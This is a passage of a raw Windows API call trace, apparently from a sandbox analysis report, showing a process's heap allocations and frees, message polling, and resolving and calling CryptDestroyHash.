Flags=0x0, Size=0x8) returned 0x2e55078 [0224.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0224.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0224.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0224.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0224.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0224.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0224.440] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0224.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0224.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0224.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0224.441] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0224.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0224.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0224.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0224.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0224.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0224.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0224.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0224.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51118 [0224.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51148 [0224.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e510e8 [0224.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0224.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e512b0 [0224.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f6e8 [0224.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0224.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51130 [0224.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51028 [0224.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e511c0 [0224.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0224.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51160 [0224.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0224.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f6e8 | out: hHeap=0x970000) returned 1 [0224.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e511f0 [0224.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0224.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51178 [0224.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e511d8 [0224.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0224.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51058 [0224.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51190 [0224.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0224.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51208 [0224.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51070 [0224.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0224.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0224.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0224.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04658 [0224.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0224.442] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0224.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04658 | out: hHeap=0x970000) returned 1 [0224.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0224.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51298 [0224.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0224.443] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0224.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0224.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0224.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0224.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0224.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0224.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0224.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0224.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0224.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0224.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0224.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0224.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0224.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0224.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0224.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0224.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0224.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0224.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0224.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0224.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3a0 [0224.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0224.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0224.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0224.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0224.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0224.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0224.444] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0224.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0224.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0224.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0224.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0224.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0224.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0224.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0224.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0224.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0224.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0224.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0224.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0224.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0224.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0224.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0224.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0224.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0224.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0224.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0224.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0224.445] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0224.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11) returned 0x2e69bc8 [0224.445] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e69bc8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0224.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0224.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f6e8 [0224.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0224.446] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyHash") returned 0x756ff0e0 [0224.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f6e8 | out: hHeap=0x970000) returned 1 [0224.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0224.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0224.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0224.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0224.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0224.446] CryptDestroyHash (hHash=0xa873d0) returned 1 [0224.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0224.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0224.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0224.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0224.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0224.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0224.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0224.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0224.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0224.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0224.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0224.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0224.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0224.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0224.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0224.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0224.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0224.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0224.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0224.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0224.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0224.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0224.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0224.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0224.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0224.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0224.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0224.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0224.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0224.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3a0 | out: hHeap=0x970000) returned 1 [0224.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0224.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0224.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0224.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0224.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0224.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0224.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0224.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0224.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0224.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0224.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0224.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0224.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0224.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0224.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0224.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0224.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0224.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0224.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0224.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0224.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0224.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0224.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0224.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0224.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0224.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0224.452] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0224.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0224.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0224.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0224.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0224.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0224.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0224.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0224.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0224.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0224.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0224.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0224.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0224.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0224.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0224.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0224.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0224.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0224.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0224.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0224.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977938 | out: hHeap=0x970000) returned 1 [0224.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0224.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0224.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0224.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0224.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0224.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0224.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f6c0 | out: hHeap=0x970000) returned 1 [0224.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0224.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0224.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0224.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0224.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0224.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0224.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0224.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0224.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0224.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0224.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0224.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0224.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f530 | out: hHeap=0x970000) returned 1 [0224.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0224.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0224.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0224.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3f0 | out: hHeap=0x970000) returned 1 [0224.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0224.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f698 | out: hHeap=0x970000) returned 1 [0224.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0224.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f418 | out: hHeap=0x970000) returned 1 [0224.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0224.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0224.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0224.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f580 | out: hHeap=0x970000) returned 1 [0224.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0224.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0224.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f670 | out: hHeap=0x970000) returned 1 [0224.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0224.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f800 | out: hHeap=0x970000) returned 1 [0224.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0224.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f508 | out: hHeap=0x970000) returned 1 [0224.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0224.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5a8 | out: hHeap=0x970000) returned 1 [0224.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0224.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0224.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0224.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5f8 | out: hHeap=0x970000) returned 1 [0224.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0224.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0224.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0224.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0224.455] 